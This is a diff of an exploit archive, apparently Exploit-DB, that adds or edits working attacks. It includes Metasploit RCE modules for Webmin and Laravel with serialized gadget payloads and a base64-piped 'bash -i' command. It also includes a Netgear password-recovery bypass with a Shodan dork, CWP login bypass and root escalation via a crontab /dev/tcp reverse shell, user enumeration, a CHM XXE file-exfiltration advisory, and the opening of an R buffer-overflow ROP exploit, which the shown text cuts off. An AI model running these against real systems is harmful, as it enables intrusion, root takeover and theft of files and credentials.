diff --git a/exploits/hardware/webapps/47117.txt b/exploits/hardware/webapps/47117.txt
index dcb7a8a55..5dc1b38e3 100644
--- a/exploits/hardware/webapps/47117.txt
+++ b/exploits/hardware/webapps/47117.txt
@@ -38,22 +38,23 @@ download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS ||
-# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure
# Date: 13/07/2019
# Exploit Author: Wadeek
-# Hardware Version: R6080-100PES
-# Firmware Version: 1.0.0.34 / 1.0.0.40
-# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
-# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+# Hardware Version: JWNR2010v5
+# Firmware Version: 1.1.0.54
+# Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip
+# Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5"
== Files Containing Juicy Info ==
>> http://192.168.1.1/currentsetting.htm
-Firmware=V1.0.0.34WW
-Model=R6080
->> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
-SSSSSSSNNNNNN
+Firmware=V1.1.0.54
+Model=JWNR2010v5
+>> http://192.168.1.1/BRS_netgear_success.html (Serial Number)
+setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000);
-== Security Questions Bypass > Answers Disclosure ==
+== Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
@@ -62,14 +63,14 @@ dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=sec
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
-
-
+
+
(repeat recovery process for get admin password)
== Authenticated Telnet Command Execution ==
>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
-R6080 login: admin
+JWNR2010v5 login: admin
Password: Str0nG-!P4ssW0rD
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
diff --git a/exploits/linux/remote/46984.rb b/exploits/linux/remote/46984.rb
index 96422462b..985a603f1 100755
--- a/exploits/linux/remote/46984.rb
+++ b/exploits/linux/remote/46984.rb
@@ -10,12 +10,11 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
+ 'Name' => 'Webmin Package Updates Remote Command Execution',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
-
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
@@ -23,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
- ['CVE', '2019-'],
+ ['CVE', '2019-12840'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
],
'Privileged' => true,
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
{
'RPORT' => 10000,
'SSL' => false,
- 'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
+ 'PAYLOAD' => 'cmd/unix/reverse_perl'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
@@ -63,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
- 'cookie' => 'testing=1',
+ 'cookie' => 'testing=1', # it must be used for "Error - No cookies"
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
@@ -78,32 +77,43 @@ class MetasploitModule < Msf::Exploit::Remote
return nil unless res
''
end
-##
-# Target and input verification
-##
+
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
- # check package update priv
+ # check version
res = send_request_cgi({
- 'uri' => normalize_uri(target_uri.path, "package-updates/"),
- 'cookie' => "sid=#{cookie}"
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
+ 'cookie' => "sid=#{cookie}",
+ 'vars_get' => { "xnavigation" => "1" }
})
- if res && res.code == 200 && res.body =~ /Software Package Update/
- print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
- return CheckCode::Vulnerable
+ if res && res.code == 302 && res.body
+ version = res.body.split("- Webmin 1.")[1]
+ return CheckCode::Detected if version.nil?
+ version = version.split(" ")[0]
+ if version <= "910"
+ # check package update priv
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, "package-updates/"),
+ 'cookie' => "sid=#{cookie}"
+ })
+
+ if res && res.code == 200 && res.body =~ /Software Package Update/
+ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+ return CheckCode::Vulnerable
+ end
+ end
end
- print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
+ print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
-##
-# Exploiting phase
-##
+
def exploit
cookie = login
if cookie == '' || cookie.nil?
@@ -111,43 +121,36 @@ class MetasploitModule < Msf::Exploit::Remote
end
print_good("Session cookie: #{cookie}")
- res = send_request_raw(
+ res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
- 'headers' =>
- {
- 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
- },
- 'cookie' => "redirect=1; testing=1; sid=#{cookie}"
+ 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+ 'cookie' => "sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
- exec(cookie)
-
+ run_update(cookie)
end
- def exec(cookie)
-
- command = payload.encoded
+ def run_update(cookie)
+ @b64p = Rex::Text.encode_base64(payload.encoded)
+ perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+ payload = Rex::Text.uri_encode(perl_payload)
res = send_request_cgi(
{
- 'method' => 'POST',
- 'cookie' => "sid=#{cookie}",
- 'ctype' => 'application/x-www-form-urlencoded',
- 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
- 'headers' =>
- {
- 'Referer' => "#{peer}/package-updates/?xnavigation=1"
- },
- 'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
+ 'method' => 'POST',
+ 'cookie' => "sid=#{cookie}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+ 'headers' =>
+ {
+ 'Referer' => "#{peer}/package-updates/?xnavigation=1"
+ },
+ 'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
})
-
end
-end
-##
-# The end of the adventure (o_O) // AkkuS
-##
\ No newline at end of file
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47129.rb b/exploits/linux/remote/47129.rb
new file mode 100755
index 000000000..54f31f977
--- /dev/null
+++ b/exploits/linux/remote/47129.rb
@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
+ Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
+ an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
+ Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
+ Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
+ In some cases the APP_KEY is leaked which allows for discovery and exploitation.
+ },
+ 'DisclosureDate' => '2018-08-07',
+ 'Author' =>
+ [
+ 'Ståle Pettersen', # Discovery
+ 'aushack', # msf exploit + other leak
+ ],
+ 'References' =>
+ [
+ ['CVE', '2018-15133'],
+ ['CVE', '2017-16894'],
+ ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
+ ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
+ ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultTarget' => 0,
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
+ 'Payload' => { 'DisableNops' => true },
+ 'Targets' => [[ 'Automatic', {} ]],
+ ))
+
+ register_options([
+ OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
+ OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
+ ])
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'GET'
+ })
+
+ # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
+ unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
+ return CheckCode::Unknown
+ end
+
+ auth_token = check_appkey
+ if auth_token.blank? || test_appkey(auth_token) == false
+ vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+ return CheckCode::Detected
+ end
+
+ random_string = Rex::Text.rand_text_alphanumeric(12)
+
+ 1.upto(4) do |method|
+ vuln = generate_token("echo #{random_string}", auth_token, method)
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => "#{vuln}",
+ }
+ })
+
+ if res.body.include?(random_string)
+ return CheckCode::Vulnerable
+ # Not conclusive but witnessed in the wild
+ elsif res.body.include?('Method Not Allowed')
+ return CheckCode::Safe
+ end
+ end
+ CheckCode::Detected
+ rescue Rex::ConnectionError
+ CheckCode::Unknown
+ end
+
+ def env_leak
+ key = ''
+ vprint_status 'Checking for CVE-2017-16894 .env information leak'
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '.env'),
+ 'method' => 'GET'
+ })
+
+ # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
+ return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
+ key = $1
+
+ if key
+ vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
+ return key
+ end
+
+ vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
+ key
+ end
+
+ def framework_leak(decrypt_ex = true)
+ key = ''
+ if decrypt_ex
+ # Possible config error / 0day found by aushack during pentest
+ # Seen in the wild with recent releases
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
+ }
+ })
+
+ return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
+ else
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST'
+ })
+
+ return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
+ end
+ # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
+
+ # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
+ if res.body =~ /\>base64:(.*)\<\/span\>/
+ key = $1
+ vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
+ end
+
+ key
+ end
+
+ def check_appkey
+ key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
+ return key unless key.empty?
+
+ vprint_status 'APP_KEY not set. Will try to find it...'
+ key = env_leak
+ key = framework_leak if key.empty?
+ key = framework_leak(false) if key.empty?
+ key.empty? ? false : key
+ end
+
+ def test_appkey(value)
+ value = Rex::Text.decode_base64(value)
+ return true if value && value.length.to_i == 32
+
+ false
+ end
+
+ def generate_token(cmd, key, method)
+ # Ported phpggc Laravel RCE php objects :)
+ case method
+ when 1
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ when 2
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ when 3
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
+ when 4
+ payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+ end
+
+ cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
+ cipher.encrypt
+ cipher.key = Rex::Text.decode_base64(key)
+ iv = cipher.random_iv
+
+ value = cipher.update(payload_decoded) + cipher.final
+ pload = Rex::Text.encode_base64(value)
+ iv = Rex::Text.encode_base64(iv)
+ mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
+ iv = iv.gsub('/', '\\/') # Escape slash
+ pload = pload.gsub('/', '\\/') # Escape slash
+ json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
+ json_out = Rex::Text.encode_base64(json_value)
+
+ json_out
+ end
+
+ def exploit
+ auth_token = check_appkey
+ if auth_token.blank? || test_appkey(auth_token) == false
+ vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+ return
+ end
+
+ 1.upto(4) do |method|
+ sploit = generate_token(payload.encoded, auth_token, method)
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'headers' => {
+ 'X-XSRF-TOKEN' => sploit,
+ }
+ }, 5)
+
+ # Stop when one of the deserialization attacks works
+ break if session_created?
+
+ if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
+ print_status 'Target appears to be patched or otherwise immune'
+ end
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/47123.txt b/exploits/linux/webapps/47123.txt
new file mode 100644
index 000000000..1e529b047
--- /dev/null
+++ b/exploits/linux/webapps/47123.txt
@@ -0,0 +1,89 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for latest version
+# Version: 0.9.8.836 to 0.9.8.846
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13360, CVE-2019-13605
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product : CWP Control Web Panel
+Vulnerability Name : User panel bypass Login
+version : 0.9.8.836
+Fixed on : 0.9.8.848
+Test on : CentOS 7.6.1810 (Core)
+Reference : http://centos-webpanel.com/
+ : https://control-webpanel.com/changelog
+CVE-Number : CVE-2019-13605
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+After login success, the application will retuens base64 value and use it to authenticate again,
+That allow attacker to modify the response and become a user
+
+# ====================================================================
+# Response format (version 0.9.8.836 to 0.9.8.837)
+# ====================================================================
+
+||//theme/original
+
+
+
+# CVE-2019-13360
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
+# ====================================================================
+
+1. Login with valid username and invalid password
+2. Replace the target username in "||//theme/original"
+3. Convert to base64
+4. Place the base64 value to HTTP response body
+5. Gain access to user area
+
+
+# CVE-2019-13605
+# ====================================================================
+# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
+# ====================================================================
+
+1. Create a testing environment
+ 1.1 Create user as a target username
+ 1.2 Login as the user
+ 1.3 Save the HTTP response body (token value)
+2. Login to the real target with valid username and invalid password
+3. Place the value we saved from step 1.3 in HTTP response body
+4. Gain access to user area
+
+*The response value format is depends on version, just replace the hole value
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-07: Discovered the bug
+2019-07-07: Reported to vendor
+2019-07-07: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Advisory published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
\ No newline at end of file
diff --git a/exploits/linux/webapps/47124.txt b/exploits/linux/webapps/47124.txt
new file mode 100644
index 000000000..384b18481
--- /dev/null
+++ b/exploits/linux/webapps/47124.txt
@@ -0,0 +1,105 @@
+//====================================================================\\
+|| ||
+|| CWP Control Web Panel 0.9.8.836 - 0.9.8.839 ||
+|| Root Privilege Escalation ||
+|| ||
+\\====================================================================//
+
+# ====================================================================
+# Information
+# ====================================================================
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
+# Date: 6 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change
+version in the script)
+# Version: 0.9.8.836 to 0.9.8.839
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13359
+
+Product : CWP Control Web Panel
+Vulnerability Name : Root Privilege Escalation
+version : 0.9.8.836
+Fixed on : 0.9.8.840
+Test on : Tested on: CentOS 7.6.1810 (Core)
+Reference : http://centos-webpanel.com/
+ : https://control-webpanel.com/changelog
+CVE-Number : CVE-2019-13359
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+1. The session file are store at /tmp directory
+2. rkey value in the session file dose not change when access by the same source IP address
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+Session prepareation state
+ 1. Check the current IP address of attacker
+ 2. Set the IP address on testing environment network
+ 3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
+ 4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey"
+ 5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)
+
+ * rkey is created from client ip, then do not change client ip when attack the real target
+
+Attack state
+
+ #
+ # Method 1 Uploading via reverse shell
+ #
+
+ 1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
+ 2. Create session file through reverse shell
+
+ echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";" > /tmp/sess_123456
+
+ 3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+ 4. Change file permission "chmod 664 /tmp/sess_123456"
+ 5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+ 6. Open the URL and become the root user
+
+
+ #
+ # Method 2 Uploading via File manager function
+ #
+
+ 1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
+ 2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
+ 3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
+ 4. Open the URL and become the root user
+
+ *From step 1 - 4 need doing it quickly. if we do it too slow, the application will change the permission of file sess_123456 to 600, and the file will become 0 byte. If this happened, attacker need to change session file name and repeat the steps again
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-06-30: Discovered the bug
+2019-06-30: Reported to vendor
+2019-06-30: Vender accepted the vulnerability
+2019-07-02: The vulnerability has been fixed
+2019-07-06: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/linux/webapps/47125.txt b/exploits/linux/webapps/47125.txt
new file mode 100644
index 000000000..b078c0268
--- /dev/null
+++ b/exploits/linux/webapps/47125.txt
@@ -0,0 +1,119 @@
+# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
+# Date: 15 July 2019
+# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
+# Vendor Homepage: https://control-webpanel.com/changelog
+# Software Link: Not available, user panel only available for lastest version
+# Version: 0.9.8.836 to 0.9.8.847
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-13383
+
+# ====================================================================
+# Information
+# ====================================================================
+
+Product : CWP Control Web Panel
+version : 0.9.8.838
+Fixed on : 0.9.8.848
+Test on : CentOS 7.6.1810 (Core)
+Reference : https://control-webpanel.com/
+CVE-Number : 2019-13383
+
+
+
+# ====================================================================
+# Root course of the vulnerability
+# ====================================================================
+The server response different message between login with valid and invalid user.
+This allows attackers to check whether a username is valid by reading the HTTP response.
+
+
+
+# ====================================================================
+# Steps to Reproduce
+# ====================================================================
+
+1. Login with a random user by using invalid password
+
+POST /login/index.php?acc=validate HTTP/1.1
+Host: 192.168.80.137:2083
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+csrftoken: d41d8cd98f00b204e9800998ecf8427e
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Connection: close
+Referer: https://192.168.80.137:2083/login/?acc=logon
+
+username=AAA&password=c2Rmc2Rm
+
+
+
+2. Check the HTTP response body
+
+2.1 User does not exist (server response suspended)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:39:06 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 9
+
+suspended
+
+
+2.2 User does exist (server response nothing)
+
+HTTP/1.1 200 OK
+Server: cwpsrv
+Date: Mon, 15 Jul 2019 01:40:12 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+X-Powered-By: PHP/7.0.32
+Content-Length: 0
+
+
+
+3. HTTP response body format depends on software version, but all of them keep responding differently as the example below
+
+------------------------------------------------------------
+| Username | Password | Result |
+
+------------------------------------------------------------
+| valid | valid | login success |
+
+| valid | invalid | {"error":"failed"} |
+
+| invalid | invalid | {"error":"user_invalid"} |
+------------------------------------------------------------
+
+
+
+# ====================================================================
+# PoC
+# ====================================================================
+https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md
+
+
+
+# ====================================================================
+# Timeline
+# ====================================================================
+2019-07-06: Discovered the bug
+2019-07-06: Reported to vendor
+2019-07-06: Vender accepted the vulnerability
+2019-07-11: The vulnerability has been fixed
+2019-07-15: Published
+
+
+
+# ====================================================================
+# Discovered by
+# ====================================================================
+Pongtorn Angsuchotmetee
+Nissana Sirijirakal
+Narin Boonwasanarak
\ No newline at end of file
diff --git a/exploits/windows/dos/47127.txt b/exploits/windows/dos/47127.txt
new file mode 100644
index 000000000..6052d2865
--- /dev/null
+++ b/exploits/windows/dos/47127.txt
@@ -0,0 +1,105 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Compiled HTML Help "hh.exe"
+
+Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
+The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
+CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
+
+
+[Vulnerability Type]
+Uncompiled .CHM File XML External Entity Injection
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
+simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
+Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.
+
+Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
+having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
+
+While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
+create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
+
+Note: User interaction is required to exploit this vulnerability.
+
+
+[Exploit/POC]
+1) python -m SimpleHTTPServer
+
+
+2) "XXE.chm.chm"
+
+
+
+
+Uncompiled CHM File XXE PoC
+
+
+
+
+
+
+%dtd;]>
+&send;
+
+
+
+
+
+3) "payload.dtd" (hosted in python web-server dir port 81 above)
+
+
+">
+%all;
+
+
+Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
+
+Tested successfully Windows 7/10
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=iaxp1iBDWXY
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: April 25, 2019
+MSRC Response: "We determined that this behavior is considered to be by design"
+July 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47122.py b/exploits/windows/local/47122.py
new file mode 100755
index 000000000..46a1f479a
--- /dev/null
+++ b/exploits/windows/local/47122.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python
+# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
+# Date: 2019-07-15
+# Exploit Author: blackleitus
+# Vendor Homepage: https://www.r-project.org/
+# Tested on: Windows 10 Home Single Language 64-bit
+# Social: https://twitter.com/blackleitus
+# Website: https://skybulk.github.io/
+# discovered by: bzyo
+
+
+# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
+import struct
+
+outfile = 'payload.txt'
+
+def create_rop_chain():
+ rop_gadgets = [
+ 0x6c998f58, # POP EAX # RETN [R.dll]
